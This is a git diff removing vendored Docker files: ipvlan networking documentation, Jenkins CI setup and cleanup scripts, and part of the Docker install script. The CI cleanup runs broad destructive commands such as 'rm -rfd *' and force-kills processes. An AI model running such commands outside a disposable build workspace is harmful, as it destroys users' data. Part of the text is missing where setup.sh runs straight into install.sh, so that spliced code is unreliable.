(top of rack switches) will reduce hard to troubleshoot bridging instabilities. Ipvlan L2 modes is well suited for isolated VLANs only trunked into a pair of ToRs that can provide a loop-free non-blocking fabric. 
The next step further is to route at the edge via Ipvlan L3 mode that reduces a failure domain to a local host only. - -- L3 mode needs to be on a separate subnet from the default namespace since it requires a netlink route in the default namespace pointing to the Ipvlan parent interface. - -- The parent interface used in this example is `eth0` and it is on the subnet `192.168.1.0/24`. Notice the `docker network` is **not** on the same subnet as `eth0`. - -- Unlike ipvlan l2 modes, different subnets/networks can ping one another as long as they share the same parent interface `-o parent=`. - -``` -ip a show eth0 -3: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 - link/ether 00:50:56:39:45:2e brd ff:ff:ff:ff:ff:ff - inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0 -``` - -A traditional gateway doesn't mean much to an L3 mode Ipvlan interface since there is no broadcast traffic allowed. Because of that, the container default gateway simply points to the container's `eth0` device. See below for CLI output of `ip route` or `ip -6 route` from inside an L3 container for details. - -The mode ` -o ipvlan_mode=l3` must be explicitly specified since the default ipvlan mode is `l2`. - -The following example does not specify a parent interface. The network drivers will create a dummy type link for the user rather than rejecting the network creation and isolating containers from only communicating with one another. 
- -``` -# Create the Ipvlan L3 network -docker network create -d ipvlan \ - --subnet=192.168.214.0/24 \ - --subnet=10.1.214.0/24 \ - -o ipvlan_mode=l3 ipnet210 - -# Test 192.168.214.0/24 connectivity -docker run --net=ipnet210 --ip=192.168.214.10 -itd alpine /bin/sh -docker run --net=ipnet210 --ip=10.1.214.10 -itd alpine /bin/sh - -# Test L3 connectivity from 10.1.214.0/24 to 192.168.212.0/24 -docker run --net=ipnet210 --ip=192.168.214.9 -it --rm alpine ping -c 2 10.1.214.10 - -# Test L3 connectivity from 192.168.212.0/24 to 10.1.214.0/24 -docker run --net=ipnet210 --ip=10.1.214.9 -it --rm alpine ping -c 2 192.168.214.10 - -``` - -Notice there is no `--gateway=` option in the network create. The field is ignored if one is specified `l3` mode. Take a look at the container routing table from inside of the container: - -``` -# Inside an L3 mode container -$ ip route - default dev eth0 - 192.168.120.0/24 dev eth0 src 192.168.120.2 -``` - -In order to ping the containers from a remote Docker host or the container be able to ping a remote host, the remote host or the physical network in between need to have a route pointing to the host IP address of the container's Docker host eth interface. More on this as we evolve the Ipvlan `L3` story. - -### Dual Stack IPv4 IPv6 Ipvlan L2 Mode - -- Not only does Libnetwork give you complete control over IPv4 addressing, but it also gives you total control over IPv6 addressing as well as feature parity between the two address families. - -- The next example will start with IPv6 only. Start two containers on the same VLAN `139` and ping one another. Since the IPv4 subnet is not specified, the default IPAM will provision a default IPv4 subnet. That subnet is isolated unless the upstream network is explicitly routing it on VLAN `139`. 
- -``` -# Create a v6 network -docker network create -d ipvlan \ - --subnet=2001:db8:abc2::/64 --gateway=2001:db8:abc2::22 \ - -o parent=eth0.139 v6ipvlan139 - -# Start a container on the network -docker run --net=v6ipvlan139 -it --rm alpine /bin/sh - -``` - -View the container eth0 interface and v6 routing table: - -``` - eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 172.18.0.2/16 scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link - valid_lft forever preferred_lft forever - inet6 2001:db8:abc2::1/64 scope link nodad - valid_lft forever preferred_lft forever - -root@5c1dc74b1daa:/# ip -6 route -2001:db8:abc4::/64 dev eth0 proto kernel metric 256 -2001:db8:abc2::/64 dev eth0 proto kernel metric 256 -default via 2001:db8:abc2::22 dev eth0 metric 1024 -``` - -Start a second container and ping the first container's v6 address. - -``` -$ docker run --net=v6ipvlan139 -it --rm alpine /bin/sh - -root@b817e42fcc54:/# ip a show eth0 -75: eth0@if55: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 172.18.0.3/16 scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link tentative dadfailed - valid_lft forever preferred_lft forever - inet6 2001:db8:abc2::2/64 scope link nodad - valid_lft forever preferred_lft forever - -root@b817e42fcc54:/# ping6 2001:db8:abc2::1 -PING 2001:db8:abc2::1 (2001:db8:abc2::1): 56 data bytes -64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=0 ttl=64 time=0.044 ms -64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=1 ttl=64 time=0.058 ms - -2 packets transmitted, 2 packets received, 0% packet loss -round-trip min/avg/max/stddev = 0.044/0.051/0.058/0.000 ms -``` - -The next example with setup a dual stack IPv4/IPv6 network with an example VLAN ID of `140`. 
- -Next create a network with two IPv4 subnets and one IPv6 subnets, all of which have explicit gateways: - -``` -docker network create -d ipvlan \ - --subnet=192.168.140.0/24 --subnet=192.168.142.0/24 \ - --gateway=192.168.140.1 --gateway=192.168.142.1 \ - --subnet=2001:db8:abc9::/64 --gateway=2001:db8:abc9::22 \ - -o parent=eth0.140 \ - -o ipvlan_mode=l2 ipvlan140 -``` - -Start a container and view eth0 and both v4 & v6 routing tables: - -``` -docker run --net=v6ipvlan139 --ip6=2001:db8:abc2::51 -it --rm alpine /bin/sh - -root@3cce0d3575f3:/# ip a show eth0 -78: eth0@if77: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 192.168.140.2/24 scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link - valid_lft forever preferred_lft forever - inet6 2001:db8:abc9::1/64 scope link nodad - valid_lft forever preferred_lft forever - -root@3cce0d3575f3:/# ip route -default via 192.168.140.1 dev eth0 -192.168.140.0/24 dev eth0 proto kernel scope link src 192.168.140.2 - -root@3cce0d3575f3:/# ip -6 route -2001:db8:abc4::/64 dev eth0 proto kernel metric 256 -2001:db8:abc9::/64 dev eth0 proto kernel metric 256 -default via 2001:db8:abc9::22 dev eth0 metric 1024 -``` - -Start a second container with a specific `--ip4` address and ping the first host using IPv4 packets: - -``` -docker run --net=ipvlan140 --ip=192.168.140.10 -it --rm alpine /bin/sh -``` - -**Note**: Different subnets on the same parent interface in Ipvlan `L2` mode cannot ping one another. That requires a router to proxy-arp the requests with a secondary subnet. However, Ipvlan `L3` will route the unicast traffic between disparate subnets as long as they share the same `-o parent` parent link. 
- -### Dual Stack IPv4 IPv6 Ipvlan L3 Mode - -**Example:** IpVlan L3 Mode Dual Stack IPv4/IPv6, Multi-Subnet w/ 802.1q Vlan Tag:118 - -As in all of the examples, a tagged VLAN interface does not have to be used. The sub-interfaces can be swapped with `eth0`, `eth1`, `bond0` or any other valid interface on the host other then the `lo` loopback. - -The primary difference you will see is that L3 mode does not create a default route with a next-hop but rather sets a default route pointing to `dev eth` only since ARP/Broadcasts/Multicast are all filtered by Linux as per the design. Since the parent interface is essentially acting as a router, the parent interface IP and subnet needs to be different from the container networks. That is the opposite of bridge and L2 modes, which need to be on the same subnet (broadcast domain) in order to forward broadcast and multicast packets. - -``` -# Create an IPv6+IPv4 Dual Stack Ipvlan L3 network -# Gateways for both v4 and v6 are set to a dev e.g. 'default dev eth0' -docker network create -d ipvlan \ - --subnet=192.168.110.0/24 \ - --subnet=192.168.112.0/24 \ - --subnet=2001:db8:abc6::/64 \ - -o parent=eth0 \ - -o ipvlan_mode=l3 ipnet110 - - -# Start a few of containers on the network (ipnet110) -# in separate terminals and check connectivity -docker run --net=ipnet110 -it --rm alpine /bin/sh -# Start a second container specifying the v6 address -docker run --net=ipnet110 --ip6=2001:db8:abc6::10 -it --rm alpine /bin/sh -# Start a third specifying the IPv4 address -docker run --net=ipnet110 --ip=192.168.112.50 -it --rm alpine /bin/sh -# Start a 4th specifying both the IPv4 and IPv6 addresses -docker run --net=ipnet110 --ip6=2001:db8:abc6::50 --ip=192.168.112.50 -it --rm alpine /bin/sh -``` - -Interface and routing table outputs are as follows: - -``` -root@3a368b2a982e:/# ip a show eth0 -63: eth0@if59: mtu 1500 qdisc noqueue state UNKNOWN group default - link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff - inet 192.168.112.2/24 
scope global eth0 - valid_lft forever preferred_lft forever - inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link - valid_lft forever preferred_lft forever - inet6 2001:db8:abc6::10/64 scope link nodad - valid_lft forever preferred_lft forever - -# Note the default route is simply the eth device because ARPs are filtered. -root@3a368b2a982e:/# ip route - default dev eth0 scope link - 192.168.112.0/24 dev eth0 proto kernel scope link src 192.168.112.2 - -root@3a368b2a982e:/# ip -6 route -2001:db8:abc4::/64 dev eth0 proto kernel metric 256 -2001:db8:abc6::/64 dev eth0 proto kernel metric 256 -default dev eth0 metric 1024 -``` - -*Note:* There may be a bug when specifying `--ip6=` addresses: when you delete a container with a specified v6 address and then start a new container with the same v6 address, it throws the following error, as if the address isn't properly being released to the v6 pool. It will fail to unmount the container and be left dead. - -``` -docker: Error response from daemon: Address already in use. -``` - -### Manually Creating 802.1q Links - -**Vlan ID 40** - -If a user does not want the driver to create the vlan sub-interface it simply needs to exist prior to the `docker network create`. If you have sub-interface naming that is not `interface.vlan_id` it is honored in the `-o parent=` option again as long as the interface exists and is up. - -Links if manually created can be named anything you want. As long as they exist when the network is created that is all that matters. Manually created links do not get deleted regardless of the name when the network is deleted with `docker network rm`. 
- -``` -# create a new sub-interface tied to dot1q vlan 40 -ip link add link eth0 name eth0.40 type vlan id 40 - -# enable the new sub-interface -ip link set eth0.40 up - -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged -docker network create -d ipvlan \ - --subnet=192.168.40.0/24 \ - --gateway=192.168.40.1 \ - -o parent=eth0.40 ipvlan40 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh -docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh -``` - -**Example:** Vlan sub-interface manually created with any name: - -``` -# create a new sub interface tied to dot1q vlan 40 -ip link add link eth0 name foo type vlan id 40 - -# enable the new sub-interface -ip link set foo up - -# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged -docker network create -d ipvlan \ - --subnet=192.168.40.0/24 --gateway=192.168.40.1 \ - -o parent=foo ipvlan40 - -# in two separate terminals, start a Docker container and the containers can now ping one another. -docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh -docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh -``` - -Manually created links can be cleaned up with: - -``` -ip link del foo -``` - -As with all of the Libnetwork drivers, they can be mixed and matched, even as far as running 3rd party ecosystem drivers in parallel for maximum flexibility to the Docker user. 
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh deleted file mode 100644 index 662e2dcc37..0000000000 --- a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh +++ /dev/null @@ -1,35 +0,0 @@ -set +x -set +e - -echo "" -echo "" -echo "---" -echo "Now starting POST-BUILD steps" -echo "---" -echo "" - -echo INFO: Pointing to $DOCKER_HOST - -if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then - echo INFO: Removing containers... - ! docker rm -vf $(docker ps -aq) -fi - -# Remove all images which don't have docker or debian in the name -if [ ! $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }' | wc -l) -eq 0 ]; then - echo INFO: Removing images... - ! docker rmi -f $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }') -fi - -# Kill off any instances of git, go and docker, just in case -! taskkill -F -IM git.exe -T >& /dev/null -! taskkill -F -IM go.exe -T >& /dev/null -! taskkill -F -IM docker.exe -T >& /dev/null - -# Remove everything -! cd /c/jenkins/gopath/src/github.com/docker/docker -! rm -rfd * >& /dev/null -! rm -rfd .* >& /dev/null - -echo INFO: Cleanup complete -exit 0 \ No newline at end of file diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh deleted file mode 100644 index 30e5884d97..0000000000 --- a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh +++ /dev/null @@ -1,309 +0,0 @@ -# Jenkins CI script for Windows to Linux CI. -# Heavily modified by John Howard (@jhowardmsft) December 2015 to try to make it more reliable. -set +xe -SCRIPT_VER="Wed Apr 20 18:30:19 UTC 2016" - -# TODO to make (even) more resilient: -# - Wait for daemon to be running before executing docker commands -# - Check if jq is installed -# - Make sure bash is v4.3 or later. 
Can't do until all Azure nodes on the latest version -# - Make sure we are not running as local system. Can't do until all Azure nodes are updated. -# - Error if docker versions are not equal. Can't do until all Azure nodes are updated -# - Error if go versions are not equal. Can't do until all Azure nodes are updated. -# - Error if running 32-bit posix tools. Probably can take from bash --version and check contains "x86_64" -# - Warn if the CI directory cannot be deleted afterwards. Otherwise turdlets are left behind -# - Use %systemdrive% ($SYSTEMDRIVE) rather than hard code to c: for TEMP -# - Consider cross builing the Windows binary and copy across. That's a bit of a heavy lift. Only reason -# for doing that is that it mirrors the actual release process for docker.exe which is cross-built. -# However, should absolutely not be a problem if built natively, so nit-picking. -# - Tidy up of images and containers. Either here, or in the teardown script. - -ec=0 -uniques=1 -echo INFO: Started at `date`. Script version $SCRIPT_VER - - -# !README! -# There are two daemons running on the remote Linux host: -# - outer: specified by DOCKER_HOST, this is the daemon that will build and run the inner docker daemon -# from the sources matching the PR. -# - inner: runs on the host network, on a port number similar to that of DOCKER_HOST but the last two digits are inverted -# (2357 if DOCKER_HOST had port 2375; and 2367 if DOCKER_HOST had port 2376). -# The windows integration tests are run against this inner daemon. - -# get the ip, inner and outer ports. -ip="${DOCKER_HOST#*://}" -port_outer="${ip#*:}" -# inner port is like outer port with last two digits inverted. 
-port_inner=$(echo "$port_outer" | sed -E 's/(.)(.)$/\2\1/') -ip="${ip%%:*}" - -echo "INFO: IP=$ip PORT_OUTER=$port_outer PORT_INNER=$port_inner" - -# If TLS is enabled -if [ -n "$DOCKER_TLS_VERIFY" ]; then - protocol=https - if [ -z "$DOCKER_MACHINE_NAME" ]; then - ec=1 - echo "ERROR: DOCKER_MACHINE_NAME is undefined" - fi - certs=$(echo ~/.docker/machine/machines/$DOCKER_MACHINE_NAME) - curlopts="--cacert $certs/ca.pem --cert $certs/cert.pem --key $certs/key.pem" - run_extra_args="-v tlscerts:/etc/docker" - daemon_extra_args="--tlsverify --tlscacert /etc/docker/ca.pem --tlscert /etc/docker/server.pem --tlskey /etc/docker/server-key.pem" -else - protocol=http -fi - -# Save for use by make.sh and scripts it invokes -export MAIN_DOCKER_HOST="tcp://$ip:$port_inner" - -# Verify we can get the remote node to respond to _ping -if [ $ec -eq 0 ]; then - reply=`curl -s $curlopts $protocol://$ip:$port_outer/_ping` - if [ "$reply" != "OK" ]; then - ec=1 - echo "ERROR: Failed to get an 'OK' response from the docker daemon on the Linux node" - echo " at $ip:$port_outer when called with an http request for '_ping'. This implies that" - echo " either the daemon has crashed/is not running, or the Linux node is unavailable." - echo - echo " A regular ping to the remote Linux node is below. It should reply. If not, the" - echo " machine cannot be reached at all and may have crashed. If it does reply, it is" - echo " likely a case of the Linux daemon not running or having crashed, which requires" - echo " further investigation." - echo - echo " Try re-running this CI job, or ask on #docker-dev or #docker-maintainers" - echo " for someone to perform further diagnostics, or take this node out of rotation." - echo - ping $ip - else - echo "INFO: The Linux nodes outer daemon replied to a ping. Good!" - fi -fi - -# Get the version from the remote node. Note this may fail if jq is not installed. -# That's probably worth checking to make sure, just in case. 
-if [ $ec -eq 0 ]; then - remoteVersion=`curl -s $curlopts $protocol://$ip:$port_outer/version | jq -c '.Version'` - echo "INFO: Remote daemon is running docker version $remoteVersion" -fi - -# Compare versions. We should really fail if result is no 1. Output at end of script. -if [ $ec -eq 0 ]; then - uniques=`docker version | grep Version | /usr/bin/sort -u | wc -l` -fi - -# Make sure we are in repo -if [ $ec -eq 0 ]; then - if [ ! -d hack ]; then - echo "ERROR: Are you sure this is being launched from a the root of docker repository?" - echo " If this is a Windows CI machine, it should be c:\jenkins\gopath\src\github.com\docker\docker." - echo " Current directory is `pwd`" - ec=1 - fi -fi - -# Are we in split binary mode? -if [ `grep DOCKER_CLIENTONLY Makefile | wc -l` -gt 0 ]; then - splitBinary=0 - echo "INFO: Running in single binary mode" -else - splitBinary=1 - echo "INFO: Running in split binary mode" -fi - - -# Get the commit has and verify we have something -if [ $ec -eq 0 ]; then - export COMMITHASH=$(git rev-parse --short HEAD) - echo INFO: Commmit hash is $COMMITHASH - if [ -z $COMMITHASH ]; then - echo "ERROR: Failed to get commit hash. Are you sure this is a docker repository?" - ec=1 - fi -fi - -# Redirect to a temporary location. Check is here for local runs from Jenkins machines just in case not -# in the right directory where the repo is cloned. We also redirect TEMP to not use the environment -# TEMP as when running as a standard user (not local system), it otherwise exposes a bug in posix tar which -# will cause CI to fail from Windows to Linux. Obviously it's not best practice to ever run as local system... -if [ $ec -eq 0 ]; then - export TEMP=/c/CI/CI-$COMMITHASH - export TMP=$TEMP - /usr/bin/mkdir -p $TEMP # Make sure Linux mkdir for -p -fi - -# Tidy up time -if [ $ec -eq 0 ]; then - echo INFO: Deleting pre-existing containers and images... - - # Force remove all containers based on a previously built image with this commit - ! 
docker rm -f $(docker ps -aq --filter "ancestor=docker:$COMMITHASH") &>/dev/null - - # Force remove any container with this commithash as a name - ! docker rm -f $(docker ps -aq --filter "name=docker-$COMMITHASH") &>/dev/null - - # This SHOULD never happen, but just in case, also blow away any containers - # that might be around. - ! if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then - echo WARN: There were some leftover containers. Cleaning them up. - ! docker rm -f $(docker ps -aq) - fi - - # Force remove the image if it exists - ! docker rmi -f "docker-$COMMITHASH" &>/dev/null -fi - -# Provide the docker version for debugging purposes. If these fail, game over. -# as the Linux box isn't responding for some reason. -if [ $ec -eq 0 ]; then - echo INFO: Docker version and info of the outer daemon on the Linux node - echo - docker version - ec=$? - if [ 0 -ne $ec ]; then - echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" - fi - echo -fi - -# Same as above, but docker info -if [ $ec -eq 0 ]; then - echo - docker info - ec=$? - if [ 0 -ne $ec ]; then - echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?" - fi - echo -fi - -# build the daemon image -if [ $ec -eq 0 ]; then - echo "INFO: Running docker build on Linux host at $DOCKER_HOST" - if [ $splitBinary -eq 0 ]; then - set -x - docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" . - cat < 0 ? 
1 : 0 )) -done - -case "$mirror" in - AzureChinaCloud) - apt_url="https://mirror.azure.cn/docker-engine/apt" - yum_url="https://mirror.azure.cn/docker-engine/yum" - ;; -esac - -command_exists() { - command -v "$@" > /dev/null 2>&1 -} - -echo_docker_as_nonroot() { - if command_exists docker && [ -e /var/run/docker.sock ]; then - ( - set -x - $sh_c 'docker version' - ) || true - fi - your_user=your-user - [ "$user" != 'root' ] && your_user="$user" - # intentionally mixed spaces and tabs here -- tabs are stripped by "<<-EOF", spaces are kept in the output - cat <<-EOF - - If you would like to use Docker as a non-root user, you should now consider - adding your user to the "docker" group with something like: - - sudo usermod -aG docker $your_user - - Remember that you will have to log out and back in for this to take effect! - - EOF -} - -# Check if this is a forked Linux distro -check_forked() { - - # Check for lsb_release command existence, it usually exists in forked distros - if command_exists lsb_release; then - # Check if the `-u` option is supported - set +e - lsb_release -a -u > /dev/null 2>&1 - lsb_release_exit_code=$? - set -e - - # Check if the command has exited successfully, it means we're in a forked distro - if [ "$lsb_release_exit_code" = "0" ]; then - # Print info about current distro - cat <<-EOF - You're using '$lsb_dist' version '$dist_version'. - EOF - - # Get the upstream release info - lsb_dist=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'id' | cut -d ':' -f 2 | tr -d '[[:space:]]') - dist_version=$(lsb_release -a -u 2>&1 | tr '[:upper:]' '[:lower:]' | grep -E 'codename' | cut -d ':' -f 2 | tr -d '[[:space:]]') - - # Print info about upstream distro - cat <<-EOF - Upstream release is '$lsb_dist' version '$dist_version'. - EOF - else - if [ -r /etc/debian_version ] && [ "$lsb_dist" != "ubuntu" ] && [ "$lsb_dist" != "raspbian" ]; then - # We're Debian and don't even know it! 
- lsb_dist=debian - dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" - case "$dist_version" in - 9) - dist_version="stretch" - ;; - 8|'Kali Linux 2') - dist_version="jessie" - ;; - 7) - dist_version="wheezy" - ;; - esac - fi - fi - fi -} - -rpm_import_repository_key() { - local key=$1; shift - local tmpdir=$(mktemp -d) - chmod 600 "$tmpdir" - for key_server in $key_servers ; do - gpg --homedir "$tmpdir" --keyserver "$key_server" --recv-keys "$key" && break - done - gpg --homedir "$tmpdir" -k "$key" >/dev/null - gpg --homedir "$tmpdir" --export --armor "$key" > "$tmpdir"/repo.key - rpm --import "$tmpdir"/repo.key - rm -rf "$tmpdir" -} - -semverParse() { - major="${1%%.*}" - minor="${1#$major.}" - minor="${minor%%.*}" - patch="${1#$major.$minor.}" - patch="${patch%%[-.]*}" -} - -do_install() { - architecture=$(uname -m) - case $architecture in - # officially supported - amd64|x86_64) - ;; - # unofficially supported with available repositories - armv6l|armv7l) - ;; - # unofficially supported without available repositories - aarch64|arm64|ppc64le|s390x) - cat 1>&2 <<-EOF - Error: Docker doesn't officially support $architecture and no Docker $architecture repository exists. - EOF - exit 1 - ;; - # not supported - *) - cat >&2 <<-EOF - Error: $architecture is not a recognized platform. - EOF - exit 1 - ;; - esac - - if command_exists docker; then - version="$(docker -v | cut -d ' ' -f3 | cut -d ',' -f1)" - MAJOR_W=1 - MINOR_W=10 - - semverParse $version - - shouldWarn=0 - if [ $major -lt $MAJOR_W ]; then - shouldWarn=1 - fi - - if [ $major -le $MAJOR_W ] && [ $minor -lt $MINOR_W ]; then - shouldWarn=1 - fi - - cat >&2 <<-'EOF' - Warning: the "docker" command appears to already exist on this system. - - If you already have Docker installed, this script can cause trouble, which is - why we're displaying this warning and provide the opportunity to cancel the - installation. 
- - If you installed the current Docker package using this script and are using it - EOF - - if [ $shouldWarn -eq 1 ]; then - cat >&2 <<-'EOF' - again to update Docker, we urge you to migrate your image store before upgrading - to v1.10+. - - You can find instructions for this here: - https://github.com/docker/docker/wiki/Engine-v1.10.0-content-addressability-migration - EOF - else - cat >&2 <<-'EOF' - again to update Docker, you can safely ignore this message. - EOF - fi - - cat >&2 <<-'EOF' - - You may press Ctrl+C now to abort this script. - EOF - ( set -x; sleep 20 ) - fi - - user="$(id -un 2>/dev/null || true)" - - sh_c='sh -c' - if [ "$user" != 'root' ]; then - if command_exists sudo; then - sh_c='sudo -E sh -c' - elif command_exists su; then - sh_c='su -c' - else - cat >&2 <<-'EOF' - Error: this installer needs the ability to run commands as root. - We are unable to find either "sudo" or "su" available to make this happen. - EOF - exit 1 - fi - fi - - curl='' - if command_exists curl; then - curl='curl -sSL' - elif command_exists wget; then - curl='wget -qO-' - elif command_exists busybox && busybox --list-modules | grep -q wget; then - curl='busybox wget -qO-' - fi - - # check to see which repo they are trying to install from - if [ -z "$repo" ]; then - repo='main' - if [ "https://test.docker.com/" = "$url" ]; then - repo='testing' - elif [ "https://experimental.docker.com/" = "$url" ]; then - repo='experimental' - fi - fi - - # perform some very rudimentary platform detection - lsb_dist='' - dist_version='' - if command_exists lsb_release; then - lsb_dist="$(lsb_release -si)" - fi - if [ -z "$lsb_dist" ] && [ -r /etc/lsb-release ]; then - lsb_dist="$(. 
/etc/lsb-release && echo "$DISTRIB_ID")" - fi - if [ -z "$lsb_dist" ] && [ -r /etc/debian_version ]; then - lsb_dist='debian' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/fedora-release ]; then - lsb_dist='fedora' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/oracle-release ]; then - lsb_dist='oracleserver' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/centos-release ]; then - lsb_dist='centos' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/redhat-release ]; then - lsb_dist='redhat' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/photon-release ]; then - lsb_dist='photon' - fi - if [ -z "$lsb_dist" ] && [ -r /etc/os-release ]; then - lsb_dist="$(. /etc/os-release && echo "$ID")" - fi - - lsb_dist="$(echo "$lsb_dist" | tr '[:upper:]' '[:lower:]')" - - # Special case redhatenterpriseserver - if [ "${lsb_dist}" = "redhatenterpriseserver" ]; then - # Set it to redhat, it will be changed to centos below anyways - lsb_dist='redhat' - fi - - case "$lsb_dist" in - - ubuntu) - if command_exists lsb_release; then - dist_version="$(lsb_release --codename | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/lsb-release ]; then - dist_version="$(. /etc/lsb-release && echo "$DISTRIB_CODENAME")" - fi - ;; - - debian|raspbian) - dist_version="$(cat /etc/debian_version | sed 's/\/.*//' | sed 's/\..*//')" - case "$dist_version" in - 8) - dist_version="jessie" - ;; - 7) - dist_version="wheezy" - ;; - esac - ;; - - oracleserver) - # need to switch lsb_dist to match yum repo URL - lsb_dist="oraclelinux" - dist_version="$(rpm -q --whatprovides redhat-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//')" - ;; - - fedora|centos|redhat) - dist_version="$(rpm -q --whatprovides ${lsb_dist}-release --queryformat "%{VERSION}\n" | sed 's/\/.*//' | sed 's/\..*//' | sed 's/Server*//' | sort | tail -1)" - ;; - - "vmware photon") - lsb_dist="photon" - dist_version="$(. 
/etc/os-release && echo "$VERSION_ID")" - ;; - - *) - if command_exists lsb_release; then - dist_version="$(lsb_release --codename | cut -f2)" - fi - if [ -z "$dist_version" ] && [ -r /etc/os-release ]; then - dist_version="$(. /etc/os-release && echo "$VERSION_ID")" - fi - ;; - - - esac - - # Check if this is a forked Linux distro - check_forked - - # Run setup for each distro accordingly - case "$lsb_dist" in - ubuntu|debian|raspbian) - export DEBIAN_FRONTEND=noninteractive - - did_apt_get_update= - apt_get_update() { - if [ -z "$did_apt_get_update" ]; then - ( set -x; $sh_c 'sleep 3; apt-get update' ) - did_apt_get_update=1 - fi - } - - if [ "$lsb_dist" != "raspbian" ]; then - # aufs is preferred over devicemapper; try to ensure the driver is available. - if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then - if uname -r | grep -q -- '-generic' && dpkg -l 'linux-image-*-generic' | grep -qE '^ii|^hi' 2>/dev/null; then - kern_extras="linux-image-extra-$(uname -r) linux-image-extra-virtual" - - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q '"$kern_extras" ) || true - - if ! grep -q aufs /proc/filesystems && ! $sh_c 'modprobe aufs'; then - echo >&2 'Warning: tried to install '"$kern_extras"' (for AUFS)' - echo >&2 ' but we still have no AUFS. Docker may not work. Proceeding anyways!' - ( set -x; sleep 10 ) - fi - else - echo >&2 'Warning: current kernel is not supported by the linux-image-extra-virtual' - echo >&2 ' package. We have no AUFS support. Consider installing the packages' - echo >&2 ' linux-image-virtual kernel and linux-image-extra-virtual for AUFS support.' 
- ( set -x; sleep 10 ) - fi - fi - fi - - # install apparmor utils if they're missing and apparmor is enabled in the kernel - # otherwise Docker will fail to start - if [ "$(cat /sys/module/apparmor/parameters/enabled 2>/dev/null)" = 'Y' ]; then - if command -v apparmor_parser >/dev/null 2>&1; then - echo 'apparmor is enabled in the kernel and apparmor utils were already installed' - else - echo 'apparmor is enabled in the kernel, but apparmor_parser is missing. Trying to install it..' - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q apparmor' ) - fi - fi - - if [ ! -e /usr/lib/apt/methods/https ]; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q apt-transport-https ca-certificates' ) - fi - if [ -z "$curl" ]; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q curl ca-certificates' ) - curl='curl -sSL' - fi - if ! command -v gpg > /dev/null; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q gnupg2 || apt-get install -y -q gnupg' ) - fi - - # dirmngr is a separate package in ubuntu yakkety; see https://bugs.launchpad.net/ubuntu/+source/apt/+bug/1634464 - if ! 
command -v dirmngr > /dev/null; then - apt_get_update - ( set -x; $sh_c 'sleep 3; apt-get install -y -q dirmngr' ) - fi - - ( - set -x - for key_server in $key_servers ; do - $sh_c "apt-key adv --keyserver hkp://${key_server}:80 --recv-keys ${gpg_fingerprint}" && break - done - $sh_c "apt-key adv -k ${gpg_fingerprint} >/dev/null" - $sh_c "mkdir -p /etc/apt/sources.list.d" - $sh_c "echo deb \[arch=$(dpkg --print-architecture)\] ${apt_url}/repo ${lsb_dist}-${dist_version} ${repo} > /etc/apt/sources.list.d/docker.list" - $sh_c 'sleep 3; apt-get update; apt-get install -y -q docker-engine' - ) - echo_docker_as_nonroot - exit 0 - ;; - - fedora|centos|redhat|oraclelinux|photon) - if [ "${lsb_dist}" = "redhat" ]; then - # we use the centos repository for both redhat and centos releases - lsb_dist='centos' - fi - $sh_c "cat >/etc/yum.repos.d/docker-${repo}.repo" <<-EOF - [docker-${repo}-repo] - name=Docker ${repo} Repository - baseurl=${yum_url}/repo/${repo}/${lsb_dist}/${dist_version} - enabled=1 - gpgcheck=1 - gpgkey=${yum_url}/gpg - EOF - if [ "$lsb_dist" = "fedora" ] && [ "$dist_version" -ge "22" ]; then - ( - set -x 